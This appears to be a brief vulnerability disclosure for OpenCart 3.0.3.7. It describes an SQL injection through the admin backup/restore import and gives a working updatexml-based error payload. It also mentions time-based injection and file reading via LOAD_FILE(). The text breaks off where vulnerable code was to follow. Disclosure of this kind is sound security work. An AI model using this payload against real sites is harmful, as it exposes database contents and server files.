Affected version:3.0.3.7 (or < 3.0.3.7 ?)
Suppose I have obtained the admin rights of the website backend
Backstage->system->maintenance->backup/restore->restore
import file,Capture,Modify file content
Payload:INSERT INTO `opencart`.`oc_api_ip` (`api_ip_id`, `api_id`, `ip`) VALUES (5, 5, ‘123’ or updatexml(1,concat(0x7e,(version())),0) or’’);\n
If there is no error information,We may use sql time injection to achieve the effect.
Through this loophole,We can get information in the database or read the file on the computer through LOAD_FILE().
The vulnerability code is as follows
